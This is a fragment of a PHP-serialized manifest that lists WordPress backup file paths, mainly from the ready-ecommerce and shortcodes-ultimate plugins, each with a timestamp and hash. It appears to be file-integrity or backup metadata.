p-content/plugins/ready-ecommerce/modules/shipping/views/tpl/noShippingModulesInstalled.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"dad2f372967c8fc32541909441ec26b1";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/shipping/views/tpl/shippingAdminTab.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"70a998b04637342b92163b42240d8ee7";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/shortcodes/controller.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"73f10feb8c9a00c503fdc9abfd429636";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/shortcodes/js/textEditorPlugin.js";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"bf9e8a7c1b40877e4fbdd18a0c089db3";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/shortcodes/mod.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"d78a9116c14415720006179811ad9b67";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/shortcodes/views/shortcodes.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"5622de4f91cbc42e181aa8a6b26c90cd";}s:131:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/shortcodes/views/tpl/adminTextEditorPopup.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"d5bffc6e13d4d48374595a76d90098ce";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/single_product/controller.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"509f6311388081a772304f2c3a21664c";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/single_product/mod.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"48829077bf3f49496723186859bec1de";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/single_product/views/single_product.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"c8571dc13363740214eac4e91134b544";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/single_product/views/tpl/addToCartBtn.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"f6123008886b8afc573cda497e73af3d";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/single_product/views/tpl/form.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"6e721ceed24aa916c58b1a04f82170f3";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/single_product/views/tpl/single.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"e90c1373bcb31d8a65881eef98dbe5e1";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/size/mod.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"7c93b7e518e13394d754e4a1a9348b70";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/slider_widget/controller.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"e122b0ae23480d8d8e847eacaf1abf64";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/slider_widget/mod.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"c6c433b0690ff2c903bee433c551dd2f";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/slider_widget/views/slider_widget.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"69372546760ae7c47dc8279d1a06bf10";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/slider_widget/views/tpl/productSlide.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"4f491c58c143de1303964713ed643eed";}s:130:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/slider_widget/views/tpl/productsListHtml.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"a55a8fc648a4929c1fe358701b77cdf7";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/slider_widget/views/tpl/slider.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"908df12f0be433a3e340999473401a04";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/slider_widget/views/tpl/sliderForm.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"9959067ec2f089f8250d361d598cc797";}s:128:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/slider_widget/views/tpl/sliderForm_ext.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"e36c9bc54bde7dfb19d0814594a5272f";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/states/controller.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"b74280d968cdba28356769311c4584e9";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/states/mod.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"f9eabf729c038d35e3fc57c5f6d14e96";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/states/models/states.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"ff4e6503954e5464136e3aae11dd3fe3";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/states/views/states.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"0bd227f09436d95d8476c8bd8fb7ee38";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/states/views/tpl/statesTab.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"fad7fef90a7c0665afd1a50d05c4afee";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/tablerate/helper.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"c801eb028fa65bf26b5ad83fef462019";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/tablerate/mod.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"cfa15c7115114bbe03de650f8069f729";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/tablerate/mod.xml";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"9ed9ceea3438cd374850e3ce46511407";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/taxes/controller.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"5a4566967be2b6254591b670612ded5c";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/taxes/mod.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"b05d964cdd9dacffa923b060fa11b84e";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/taxes/models/taxes.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"f2592792376a4fb095951ebfd1cfae17";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/taxes/views/taxTab.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"49219ba030cf0b53fdab9e4b7b6cb70e";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/taxes/views/taxes.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"74780f5bbe36b5d253c0da563b02dfcd";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/taxes/views/tpl/addEditTax.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"e20f7ec4c172f479fddeed473e3499c1";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/taxes/views/tpl/taxTab.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"f6c0fe0b902d98e509b37368c74d793e";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/templates/controller.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"3c8d52d3d339078144c9376aa24e9f61";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/templates/mod.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"28288bf5e07b3e3d5f885bb6aa078c84";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/templates/models/templates.php";a:2:{s:1:"d";i:1517159302;s:1:"h";s:32:"c9e0adfbb776285069a3b1a5e220a532";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/templates/views/templates.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"5687c6615eec28ccbd0ee70b27c993dd";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/templates/views/templatesTab.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"710eedf3b1e5692d1c4905e8006637fb";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/templates/views/tpl/noTemplates.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"61d8e301c1dd3b60511e1023c5a5e54c";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/templates/views/tpl/templatesTab.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f0f34deeb2f4414c03a1c843206021bf";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/timthumb.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"842454b1c92562ccec5050d668fd38d0";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/twitter_widget/controller.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"a5e69d512c734ca9baea69fa3a7ac58e";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/twitter_widget/mod.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"6b43bfe342664982af753272cf3f4f8f";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/twitter_widget/views/tpl/twitter.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"59564888620edf12952c97669e1a3dd0";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/twitter_widget/views/tpl/twitterForm.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"03789a97d33426786502f60a52fcdfce";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/twitter_widget/views/twitter_widget.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"5a21ab2416d834cb1c5fd3ccfe6eb589";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/usaepay/controller.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"208e0ac64749e89c79248135df2e32b8";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/usaepay/mod.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"2f7b2e08e361b84b9b902d472a238fc3";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/usaepay/mod.xml";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"db167c54e2f339c798080ae482bab659";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/usaepay/views/tpl/form.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"69ff8a9d9350ff78e25e99bf70afe00d";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/usaepay/views/usaepay.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"0be41364c2f6cac8fd4ffd8bbb071def";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/controller.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"02032febf717f574595261e7fd986286";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/mod.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"9469bea562660ac1eeb3e7daee24c6f5";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/models/cart.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"496ce888c59f44f65f198bb32682c415";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/models/user.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"88eb36e2c49346225397048d209784fb";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/cart.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f5df12fb0099ba0271c34f9d2da6c3c3";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/login.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f1db1f7866a3656935d9944c45e66a0f";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/register.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"382ad77ff4e1f8798c8ea120ac59d932";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/accountSummary.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"0809aec0beabd3fdc9e10b66ea1032ce";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/afterProductAddMsg.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"76cefc57fc4fc4d1de17c8af923deb1e";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/checkoutLink.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"0120c3823c7f11107ca1b5cd7e0822f0";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/loginForm.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"76beea92d38de81a4ee3f42122b6ce1d";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/metaFields.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"82315ae6d489c4d884eec4fc8c77e7e6";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/passwordForgot.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"dced99f4ef764031d46a8a6e933ac0aa";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/passwordRecoverConfirm.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"b81a02213bd53efca25e08464eb61e9c";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/profile.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"832fc8110d09a7ecc0f2a41a7bb8147c";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/registrationForm.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"d592583cbc9fc73acb6ead919287b969";}s:129:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/registrationFormCheckout.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"3ecf0092fd02e661f136eaa6c64a72ac";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/shoppingCart.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"364a53939e159f2f6274fd14b2c4ed4c";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/shoppingCartEmpty.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"21c939af37f1dc4fce55a77f00c9bd14";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/tpl/userFieldsTab.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"33baa6f8c752eaff7c44765f036c1c59";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/user.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"c0bf51adbad16b958924dac9dca69284";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/user/views/userFieldsTab.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f32c853c2322c985f181b219b60b3d7d";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/modules/weight/mod.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"b09d6b46cc00a04497749d352e6adc5e";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/readme.txt";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"94c77396e4ee8e4e694248ca9f35aac4";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/all.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"aa1d2c146295347233c223adde2e224f";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/all_bk.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"e26e9579106e618d839485dec37dc587";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/billingAddress.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"1437a1f3d86269561bb02fd1ffb5b64c";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/billingAddress_bk.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"4190bd4056d44ee92e6263e196ec2bed";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/navigation.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"71ba7f15055f078a594d484f783bd63a";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/orderConfirm.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"a2955d5c9acea2d3617946366f04bb20";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/shippingAddress.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"185e81d9efd56e3a3868fffc7fd7edb7";}s:128:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/shippingAddress_bk.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"aa724adf794856375ebc6a31daf311b7";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/checkout/total.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"809c679612c4bb53b75dfa1a3f83e90c";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/coupons/checkoutInput.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"fab613b2c3d3bfd57ac8d65d40435127";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/frontend.js";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f12231e54bd7953f739de8155cc76c09";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/gifts/checkoutDisplay.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"513ff2ae819ef00826dc89e0f8d92994";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/order/orderDetails.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"a6c435eb8d6ff23d654323cafc40d527";}s:129:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/products/buttonsBuyAddToCart.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"24b63e891ef2b5703fb020062b7a6466";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/products/categoriesList.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"b7705f504c745bbad752eb89f96b864f";}s:132:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/products/productCategoryContent.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"d3676c9082b64011581010ac678fd085";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/products/productContent.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f0746401aef13e7c318c8529e901c24f";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/products/productPrice.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"d30733c79a35c0018fe90bc08da27458";}s:127:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/products/productVariations.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"a5a7cac5e94f00e9a343a6d5bae8123f";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/rates/rating_half-rtl.gif";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"3a74381a93ea98ca46c94ecd964ee183";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/rates/rating_half.gif";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"5305588cc2da4696e5e55a9ebf859f9b";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/rates/rating_off.gif";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"7d99a060172d832e2a0586a9284765b7";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/rates/rating_on.gif";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"cf853fb872bf743ae8556423ec0259ee";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/rates/rating_over.gif";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"87a12cd214984771bdfcf1ab46baff6f";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/rating.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"89f7aa761ade57d915749593095056e5";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/settings.xml";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"469eb4b242b32f1446d463f286fd29d1";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/style.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"8f5b4ed946f2362a39814e823e687750";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/subScreen.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f68433f8f936f628bac4712a730f3562";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/user/afterProductAddMsg.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f2a812f357421f499dfb128ee4619b9b";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/user/loginForm.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"76beea92d38de81a4ee3f42122b6ce1d";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/user/registrationForm.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"b9ac7626f40c60dec298831cf7ae3f96";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/ready-ecommerce/templates/standard/user/shoppingCart.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"9a4dbf063a4af9b519dffca86592a8d4";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/rt-custom-css-page-and-post/readme.txt";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"193db86f754c8b8f96d4260a54df4fb5";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/rt-custom-css-page-and-post/rt-custom-css-page-and-post.php";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"780f13c016bd88f5497f81b24eeb085e";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/animate.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"dcb29d4ae18d19b6676380fdfce54895";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/box-shortcodes.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"a41ea122f81b999a10748b37a6c27992";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/cheatsheet.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"acf3b35673c685d6b901b89c438589e8";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/content-shortcodes.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f70c3278cf3a7b9b5445382575537bf1";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/galleries-shortcodes.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"eaa7e03d3f3e1e538b0e41851c84ef2a";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/generator.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"81807529db8cc1d7856bf75d05a57421";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/magnific-popup.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"40e95695671cf5d44c56882269950a42";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/media-shortcodes.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"49a08b3be841c740146c78d66b9fec21";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/options-page.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"f631304f367e8282990102a1eab0f911";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/other-shortcodes.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"5ced4851494068d159e9cd076fbac07b";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/owl-carousel-transitions.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"c2d6c2845cb1147fd99ffa05682cb4b8";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/owl-carousel.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"4d62969e97be06cb819251476abfef44";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/players-shortcodes.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"c6fa5929888865f5099faf75cd026e79";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/qtip.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"2dd2cc1a369f91baeaef80d0242b69fb";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/simpleslider.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"6829606a9e7ea4ceace02a05c687b3ab";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/sunrise.css";a:2:{s:1:"d";i:1517159303;s:1:"h";s:32:"4e7004e9dadb7063539110c079f56389";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/shortcodes-ultimate/assets/css/tinymce.css";a:2:{s:1:"d";i:1517159303;s: